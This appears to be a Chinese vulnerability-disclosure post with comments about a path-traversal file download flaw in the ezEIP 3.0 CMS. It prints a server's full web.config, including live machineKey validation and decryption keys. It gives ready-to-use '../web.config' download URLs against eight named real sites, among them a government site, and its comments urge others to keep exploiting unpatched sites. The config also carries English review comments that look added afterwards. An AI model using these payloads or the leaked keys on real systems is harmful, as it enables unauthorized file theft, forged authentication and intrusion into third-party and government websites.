2014-04-20: 细节已通知厂商并且等待厂商处理中
2014-04-25: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-06-19: 细节向核心白帽子及相关领域专家公开
2014-06-29: 细节向普通白帽子公开
2014-07-09: 细节向实习白帽子公开
2014-07-16: 细节向公众公开
算是通用吧。。。
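<?xml version="1.0" encoding="utf-8"?>
<!--
  ASP.NET web.config for a Whir ezEIP 3.0 site (product and version are named in the
  eipSetting element below). Setting values are kept exactly as they appear in the file;
  comments starting with NOTE(review) mark the entries a defender should check first.
-->
<configuration>
  <configSections>
    <section name="urlrewritingnet" requirePermission="false" type="UrlRewritingNet.Configuration.UrlRewriteSection, UrlRewritingNet.UrlRewriter" />
    <sectionGroup name="spring">
      <section name="context" type="Spring.Context.Support.WebContextHandler, Spring.Web" />
      <section name="objects" type="Spring.Context.Support.DefaultSectionHandler, Spring.Core" />
    </sectionGroup>
    <sectionGroup name="common">
      <section name="logging" type="Common.Logging.ConfigurationSectionHandler, Common.Logging" />
    </sectionGroup>
    <section name="log4net" type="log4net.Config.Log4NetConfigurationSectionHandler,log4net" />
    <section name="cachingConfiguration" type="Microsoft.Practices.EnterpriseLibrary.Caching.Configuration.CacheManagerSettings,Microsoft.Practices.EnterpriseLibrary.Caching" />
    <section name="eipSetting" type="Whir.ezEIP.Web.EIPSetting, Whir.ezEIP" />
    <section name="neatUpload" type="Brettle.Web.NeatUpload.ConfigSectionHandler, Brettle.Web.NeatUpload" allowLocation="true" />
  </configSections>

  <!-- Spring.NET context: object definitions are loaded from two further config files. -->
  <spring>
    <context>
      <resource uri="~/config/Services.config" />
      <resource uri="~/config/Pages.config" />
    </context>
  </spring>

  <common>
    <logging>
      <factoryAdapter type="Common.Logging.Log4Net.Log4NetLoggerFactoryAdapter, Common.Logging.Log4Net">
        <!-- choices are INLINE, FILE, FILE-WATCH, EXTERNAL-->
        <!-- otherwise BasicConfigurer.Configure is used -->
        <!-- log4net configuration file is specified with key configFile-->
        <arg key="configType" value="INLINE" />
      </factoryAdapter>
    </logging>
  </common>

  <!-- Daily rolling log file written under App_Data/protected/logs/. -->
  <log4net>
    <appender name="rootRollingFile" type="log4net.Appender.RollingFileAppender,log4net">
      <threshold value="ALL" />
      <param name="File" value="App_Data/protected/logs/" />
      <param name="AppendToFile" value="true" />
      <param name="RollingStyle" value="Date" />
      <param name="DatePattern" value="yyyy-MM-dd.'log'" />
      <param name="StaticLogFileName" value="false" />
      <layout type="log4net.Layout.PatternLayout,log4net">
        <param name="ConversionPattern" value="%date [%-5thread] [%-5level] [%logger] - %message%newline %exception" />
      </layout>
    </appender>
    <root>
      <level value="INFO" />
      <!-- ALL, DEBUG, INFO, WARN, ERROR, FATAL, OFF -->
      <appender-ref ref="rootRollingFile" />
    </root>
  </log4net>

  <!-- Enterprise Library caching: five in-memory cache managers with identical limits. -->
  <cachingConfiguration defaultCacheManager="Default_Cache_Manager">
    <backingStores>
      <add name="inMemory" type="Microsoft.Practices.EnterpriseLibrary.Caching.BackingStoreImplementations.NullBackingStore, Microsoft.Practices.EnterpriseLibrary.Caching" />
    </backingStores>
    <cacheManagers>
      <add name="Default_Cache_Manager"
           expirationPollFrequencyInSeconds="60"
           maximumElementsInCacheBeforeScavenging="1000"
           numberToRemoveWhenScavenging="10"
           backingStoreName="inMemory" />
      <add name="Whir_ezEIP3_LoginUserCacheManager"
           expirationPollFrequencyInSeconds="60"
           maximumElementsInCacheBeforeScavenging="1000"
           numberToRemoveWhenScavenging="10"
           backingStoreName="inMemory" />
      <add name="Whir_ezEIP3_SiteInfoCacheManager"
           expirationPollFrequencyInSeconds="60"
           maximumElementsInCacheBeforeScavenging="1000"
           numberToRemoveWhenScavenging="10"
           backingStoreName="inMemory" />
      <add name="Whir_ezEIP3_OY_MemberCacheManager"
           expirationPollFrequencyInSeconds="60"
           maximumElementsInCacheBeforeScavenging="1000"
           numberToRemoveWhenScavenging="10"
           backingStoreName="inMemory" />
      <add name="Whir_ezEIP3_LableCacheManager"
           expirationPollFrequencyInSeconds="60"
           maximumElementsInCacheBeforeScavenging="1000"
           numberToRemoveWhenScavenging="10"
           backingStoreName="inMemory" />
    </cacheManagers>
  </cachingConfiguration>

  <!-- Product settings: names the admin path, upload, temp and template directories. -->
  <eipSetting productname="ezEIP 3.0"
              version="Whir ezEIP Website System 3.0"
              versiontype="Asp.Net"
              catchException="false"
              argumentExceptionMessage="传入参数有误!"
              adminpath="whir_system/"
              sysconfigfilepath="whir_system/configfiles/"
              uploadfilesdir="uploadfiles/"
              temporaryDir="App_Data/temp/"
              templateDir="template"
              templateDirInclude="include"
              baseTemp="res/basetemp/"
              adverDir="uploadfiles/adver/" />

  <!-- Site configuration settings (kept in a separate file). -->
  <appSettings configSource="config\AppSettings.config" />
  <connectionStrings />

  <system.web>
    <!--
      NOTE(review): validationKey and decryptionKey are static values stored in this file.
      Anyone able to read web.config obtains the keys ASP.NET uses to protect ViewState and
      forms-authentication tickets, so once the file has been disclosed the keys must be
      treated as compromised and rotated. SHA1 and 3DES are legacy algorithm choices.
    -->
    <machineKey validationKey="8BFD2ECC6A29C731ABD40D0AE4DCB46920ACE1A1"
                decryptionKey="A7AB7AD599777BC83365EC71FC66FFF2D807494707C9D53C"
                decryption="3DES"
                validation="SHA1" />

    <!--
      NOTE(review): validateRequest="false" switches off ASP.NET request validation for
      every page, so each page has to validate and encode its own input.
    -->
    <pages validateRequest="false" enableViewStateMac="true">
      <controls>
        <add tagPrefix="asp" namespace="System.Web.UI" assembly="System.Web.Extensions, Version=1.0.61025.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" />
        <add tagPrefix="whir" namespace="Wuqi.Webdiyer" assembly="AspNetPager" />
        <add tagPrefix="whir" namespace="Whir.Controls.UI.WebControls" assembly="Whir.Controls" />
        <add tagPrefix="whir" namespace="Whir.ezEIP.Web.Controls" assembly="Whir.ezEIP" />
        <!-- Template label controls. -->
        <add tagPrefix="wtl" tagName="include" src="~/Whir_System/controls/labelcontrol/wtl_include.ascx" />
        <add tagPrefix="wtl" tagName="form" src="~/Whir_System/controls/labelcontrol/wtl_form.ascx" />
        <add tagPrefix="wtl" tagName="list" src="~/Whir_System/controls/labelcontrol/wtl_list.ascx" />
        <add tagPrefix="wtl" tagName="page" src="~/Whir_System/controls/labelcontrol/wtl_page.ascx" />
        <add tagPrefix="wtl" tagName="system" src="~/Whir_System/controls/labelcontrol/wtl_system.ascx" />
        <add tagPrefix="wtl" tagName="infor" src="~/Whir_System/controls/labelcontrol/wtl_infor.ascx" />
        <add tagPrefix="wtl" tagName="inforarea" src="~/Whir_System/controls/labelcontrol/wtl_inforarea.ascx" />
        <add tagPrefix="wtl" tagName="column" src="~/Whir_System/controls/labelcontrol/wtl_column.ascx" />
        <add tagPrefix="wtl" tagName="location" src="~/Whir_System/controls/labelcontrol/wtl_location.ascx" />
        <add tagPrefix="wtl" tagName="menu" src="~/Whir_System/controls/labelcontrol/wtl_menu.ascx" />
        <add tagPrefix="wtl" tagName="type" src="~/Whir_System/controls/labelcontrol/wtl_type.ascx" />
        <add tagPrefix="wtl" tagName="play" src="~/Whir_System/controls/labelcontrol/wtl_play.ascx" />
        <add tagPrefix="wtl" tagName="flash" src="~/Whir_System/controls/labelcontrol/wtl_flash.ascx" />
        <add tagPrefix="wtl" tagName="video" src="~/Whir_System/controls/labelcontrol/wtl_video.ascx" />
        <add tagPrefix="wtl" tagName="image" src="~/Whir_System/controls/labelcontrol/wtl_image.ascx" />
        <add tagPrefix="wtl" tagName="service" src="~/Whir_System/controls/labelcontrol/wtl_service.ascx" />
        <add tagPrefix="wtl" tagName="statis" src="~/Whir_System/controls/labelcontrol/wtl_statis.ascx" />
        <add tagPrefix="wtl" tagName="photo" src="~/Whir_System/controls/labelcontrol/wtl_photo.ascx" />
        <add tagPrefix="wtl" tagName="marquee" src="~/Whir_System/controls/labelcontrol/wtl_marquee.ascx" />
        <add tagPrefix="wtl" tagName="url" src="~/Whir_System/controls/labelcontrol/wtl_url.ascx" />
        <add tagPrefix="wtl" tagName="seo" src="~/Whir_System/controls/labelcontrol/wtl_seo.ascx" />
        <add tagPrefix="wtl" tagName="comment" src="~/Whir_System/controls/labelcontrol/wtl_comment.ascx" />
        <add tagPrefix="wtl" tagName="commentlist" src="~/Whir_System/controls/labelcontrol/wtl_commentlist.ascx" />
        <add tagPrefix="wtl" tagName="search" src="~/Whir_System/controls/labelcontrol/wtl_search.ascx" />
        <add tagPrefix="wtl" tagName="jobrequest" src="~/Whir_System/controls/labelcontrol/wtl_jobrequest.ascx" />
        <add tagPrefix="wtl" tagName="resource" src="~/Whir_System/controls/labelcontrol/wtl_resource.ascx" />
        <add tagPrefix="wtl" tagName="feedback" src="~/Whir_System/controls/labelcontrol/wtl_feedback.ascx" />
        <!-- Member page controls. -->
        <add tagPrefix="wtl" tagName="forgetpassword" src="~/Whir_System/controls/pagecontrol/forgetpassword.ascx" />
        <add tagPrefix="wtl" tagName="login" src="~/Whir_System/controls/pagecontrol/login.ascx" />
        <add tagPrefix="wtl" tagName="register" src="~/Whir_System/controls/pagecontrol/register.ascx" />
        <add tagPrefix="wtl" tagName="agreement" src="~/Whir_System/controls/pagecontrol/registeragreement.ascx" />
        <add tagPrefix="wtl" tagName="memberinfo" src="~/Whir_System/controls/pagecontrol/memberinfo.ascx" />
        <add tagPrefix="wtl" tagName="changepassword" src="~/Whir_System/controls/pagecontrol/changepassword.ascx" />
        <add tagPrefix="wtl" tagName="leftmenu" src="~/Whir_System/controls/pagecontrol/LeftMenu.ascx" />
        <add tagPrefix="wtl" tagName="editor" src="~/Whir_System/controls/Editor.ascx" />
      </controls>
    </pages>

    <!-- NOTE(review): debug="true" is a development setting; production sites should run with debug="false". -->
    <compilation debug="true">
      <assemblies>
        <add assembly="System.Web.Extensions, Version=1.0.61025.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" />
      </assemblies>
      <buildProviders>
        <!-- .html files are compiled as ASP.NET pages. -->
        <add extension=".html" type="System.Web.Compilation.PageBuildProvider" />
      </buildProviders>
    </compilation>

    <!--
      The <authentication> section configures the security authentication mode
      that ASP.NET uses to identify an incoming user.
    -->
    <authentication mode="Windows" />

    <!--
      If an unhandled error occurs while a request is being processed, the
      <customErrors> section configures how it is handled. In particular, it lets
      developers configure HTML error pages to be shown in place of the error stack trace.
      <customErrors mode="On" defaultRedirect="GenericErrorPage.htm">
        <error statusCode="403" redirect="NoAccess.htm" />
        <error statusCode="404" redirect="FileNotFound.htm" />
      </customErrors>
    -->
    <customErrors mode="On" defaultRedirect="GenericErrorPage.htm">
      <error statusCode="403" redirect="NoAccess.htm" />
      <error statusCode="404" redirect="FileNotFound.htm" />
    </customErrors>

    <httpHandlers>
      <add verb="*" path="*.html" type="System.Web.UI.PageHandlerFactory" />
      <add verb="*" path="*.aspx" type="Spring.Web.Support.PageHandlerFactory, Spring.Web" />
      <add verb="*" path="checkcode.ashx" type="Whir.ezEIP.Web.HttpHandlers.CheckCodeHandler, Whir.ezEIP" />
      <add verb="*" path="gettreedata.ashx" type="Whir.ezEIP.Web.HttpHandlers.GetTreeData, Whir.ezEIP" />
      <!--
        NOTE(review): download.ashx is served by DownloadHandler (implementation not shown
        in this file). A file-serving handler has to canonicalise the requested path, reject
        parent-directory segments and confine downloads to the intended directory, so that
        configuration files such as this one can never be returned.
      -->
      <add verb="*" path="download.ashx" type="Whir.ezEIP.Web.HttpHandlers.DownloadHandler, Whir.ezEIP" />
      <add verb="*" path="formsubmit.ashx" type="Whir.ezEIP.Web.HttpHandlers.FormSubmitHandler, Whir.ezEIP" />
      <add verb="*" path="getarea.ashx" type="Whir.ezEIP.Web.HttpHandlers.GetArea, Whir.ezEIP" />
      <add verb="GET,HEAD" path="ScriptResource.axd" type="System.Web.Handlers.ScriptResourceHandler, System.Web.Extensions, Version=1.0.61025.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" validate="false" />
    </httpHandlers>

    <httpModules>
      <add name="SpringModule" type="Spring.Context.Support.WebSupportModule, Spring.Web" />
      <add name="UploadHttpModule" type="Brettle.Web.NeatUpload.UploadHttpModule, Brettle.Web.NeatUpload" />
      <add name="UrlRewriteModule" type="UrlRewritingNet.Web.UrlRewriteModule, UrlRewritingNet.UrlRewriter" />
    </httpModules>

    <!--
      NOTE(review): maxRequestLength is in KB (2097151 KB is about 2 GB) and executionTimeout
      is in seconds (3600 s is one hour). Limits this large make resource exhaustion through
      oversized or long-running requests easier; size them to the largest legitimate upload.
    -->
    <httpRuntime maxRequestLength="2097151" executionTimeout="3600" />
  </system.web>

  <!-- URL rewriting (rules kept in a separate file). -->
  <urlrewritingnet configSource="Config\UrlRewriteSettings.config" />

  <!-- For IIS7's Integrated Pipeline Mode which is used by the DefaultAppPool. -->
  <system.webServer>
    <modules>
      <add name="UploadHttpModule" type="Brettle.Web.NeatUpload.UploadHttpModule, Brettle.Web.NeatUpload" preCondition="managedHandler" />
      <add name="SpringModule" type="Spring.Context.Support.WebSupportModule, Spring.Web" />
    </modules>

    <handlers>
      <add name="html" path="*.html" verb="*" modules="IsapiModule" scriptProcessor="C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_isapi.dll" resourceType="Unspecified" preCondition="classicMode,runtimeVersionv2.0,bitness64" />
      <add verb="*" name="checkcode" path="checkcode.ashx" type="Whir.ezEIP.Web.HttpHandlers.CheckCodeHandler, Whir.ezEIP" />
      <add verb="*" name="gettreedata" path="gettreedata.ashx" type="Whir.ezEIP.Web.HttpHandlers.GetTreeData, Whir.ezEIP" />
      <!-- NOTE(review): same DownloadHandler mapping as in system.web/httpHandlers; the same path-confinement requirement applies. -->
      <add verb="*" name="download" path="download.ashx" type="Whir.ezEIP.Web.HttpHandlers.DownloadHandler, Whir.ezEIP" />
      <add verb="*" name="formsubmit" path="formsubmit.ashx" type="Whir.ezEIP.Web.HttpHandlers.FormSubmitHandler, Whir.ezEIP" />
      <add verb="*" name="getarea" path="getarea.ashx" type="Whir.ezEIP.Web.HttpHandlers.GetArea, Whir.ezEIP" />
      <add verb="*" name="SpringPageHandler" path="*.aspx" type="Spring.Web.Support.PageHandlerFactory, Spring.Web" />
      <!--<add name="SpringPageHandler" verb="*" path="*.aspx" type="Spring.Web.Support.PageHandlerFactory, Spring.Web"/>-->
      <add name="SpringContextMonitor" verb="*" path="ContextMonitor.ashx" type="Spring.Web.Support.ContextMonitor, Spring.Web" />
      <!--Not using Spring web service support-->
      <add name="SpringWebServiceSupport" verb="*" path="*.asmx" type="Spring.Web.Services.WebServiceHandlerFactory, Spring.Web" />
    </handlers>

    <validation validateIntegratedModeConfiguration="false" />

    <!--
      IIS URL Rewrite rules mapping static-looking .html URLs onto the .aspx pages.
      The '&' between query parameters is written as &amp; so the file is well-formed XML.
    -->
    <rewrite>
      <rules>
        <rule name="rules_solution_detail_en">
          <match url="solution_en/([a-zA-Z0-9]+)_(\d+).html" />
          <action type="Rewrite" url="siteen/solution_detail.aspx?PY={R:1}&amp;page={R:2}" />
        </rule>
        <rule name="rules_solution_detail_cn2">
          <match url="solution_detail_cn_([a-zA-Z0-9]+)_(\d+).html" />
          <action type="Rewrite" url="sitecn/solution_detail.aspx?PY={R:1}&amp;page={R:2}" />
        </rule>
        <rule name="rules_solution_list_en">
          <match url="solution/solution_list_en_(\d+).html" />
          <action type="Rewrite" url="siteen/solution_list.aspx?cid={R:1}" />
        </rule>
        <rule name="rules_solution_category_en">
          <match url="solution/solution_category_en_(\d+).html" />
          <action type="Rewrite" url="siteen/solution_category.aspx?cid={R:1}" />
        </rule>
        <rule name="rules_product_category_en">
          <match url="product/product_category_en_(\d+).html" />
          <action type="Rewrite" url="siteen/product_category.aspx?cid={R:1}" />
        </rule>
        <rule name="rules_product_list_en">
          <match url="product/product_list_en_(\d+).html" />
          <action type="Rewrite" url="siteen/product_list.aspx?cid={R:1}" />
        </rule>
        <rule name="rules_product_category">
          <match url="product/product_category_cn_(\d+).html" />
          <action type="Rewrite" url="sitecn/product_category.aspx?cid={R:1}" />
        </rule>
        <rule name="rules_product_list">
          <match url="product_list_cn_(\d+).html" />
          <action type="Rewrite" url="sitecn/product_list.aspx?cid={R:1}" />
        </rule>
        <rule name="rules_product_detail">
          <match url="product/product_detail_cn_(\d+).html" />
          <action type="Rewrite" url="sitecn/product_detail.aspx?pid={R:1}" />
        </rule>
        <rule name="rules_product_index">
          <match url="sitecn/product/index.html" />
          <action type="Rewrite" url="sitecn/product.aspx" />
        </rule>
        <rule name="rules_product_index_en1" stopProcessing="true">
          <match url="siteen/product/index.html" />
          <action type="Rewrite" url="siteen/product/index.html" />
        </rule>
        <rule name="rules_product_detail_PY">
          <match url="product/([a-zA-Z0-9]+).html" />
          <action type="Rewrite" url="sitecn/product_detail.aspx?PY={R:1}" />
        </rule>
        <rule name="rules_solution_index">
          <match url="solution/index.html" />
          <action type="Rewrite" url="sitecn/solution.aspx" />
        </rule>
        <rule name="rules_solution_list">
          <match url="solution_list_cn_(\d+).html" />
          <action type="Rewrite" url="sitecn/solution_list.aspx?cid={R:1}" />
        </rule>
        <rule name="rules_solution_detail">
          <match url="solution/([a-zA-Z0-9]+)_(\d+).html" />
          <action type="Rewrite" url="sitecn/solution_detail.aspx?PY={R:1}&amp;page={R:2}" />
        </rule>
        <rule name="rules_solution_category">
          <match url="solution/solution_category_cn_(\d+).html" />
          <action type="Rewrite" url="sitecn/solution_category.aspx?cid={R:1}" />
        </rule>
        <rule name="rules_news_detail_PY">
          <match url="sitecn/news/([a-zA-Z0-9]+).html" />
          <action type="Rewrite" url="sitecn/news_detail.aspx?PY={R:1}" />
        </rule>
        <rule name="rules_product_detail_en">
          <match url="product/product_detail_en_(\d+).html" />
          <action type="Rewrite" url="siteen/product_detail.aspx?pid={R:1}" />
        </rule>
        <rule name="rules_product_index_en">
          <match url="product/indexen.html" />
          <action type="Rewrite" url="siteen/product.aspx" />
        </rule>
        <rule name="rules_product_detail_PY_en">
          <match url="product_en_([a-zA-Z0-9]+).html" />
          <action type="Rewrite" url="siteen/product_detail.aspx?PY={R:1}" />
        </rule>
        <rule name="rules_solution_index_en">
          <match url="solution/indexen.html" />
          <action type="Rewrite" url="siteen/solution.aspx" />
        </rule>
        <!--<rule name="rules_news_detail_PY_en"><match url="siteen/news/([a-zA-Z0-9]+).html" /> <action type="Rewrite" url="siteen/news_detail.aspx?PY={R:1}" /> </rule>-->
      </rules>
    </rewrite>

    <defaultDocument>
      <files>
        <clear />
        <add value="index.html" />
        <add value="default.aspx" />
        <add value="Default.htm" />
        <add value="Default.asp" />
        <add value="index.htm" />
        <add value="iisstart.htm" />
      </files>
    </defaultDocument>
  </system.webServer>
</configuration>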
ezEIP 任意文件下载漏洞。测试地址:http://www.wanhu.com.cn/download.ashx?files=../web.config
测试几个网站,均有此漏洞:
http://www.sontanedu.cn/download.ashx?files=../web.config
http://www.epccn.com/download.ashx?files=../web.config
http://zwgk.tl.gov.cn//download.ashx?files=../web.config
http://www.gzwanbao.com/download.ashx?files=../web.config
http://www.bb1y.com/download.ashx?files=../web.config
http://www.zsty.org/download.ashx?files=../web.config
百度前十个网站,全部存在。其他自己挖掘吧。
来个邀请码
危害等级:无影响(厂商忽略)
忽略时间:2014-07-16 14:01
2014-04-25:sorry,一时工作较忙,忘了在时间点进行确认。该漏洞已经复现多个实例,并由CNVD向软件生产厂商通报。主要涉及商业公司,政府的后续待处置。经验证,主要涉及3.0版本。
额、楼主真受伤
@zhxs 我也发现了。。
还没修复,继续下吧……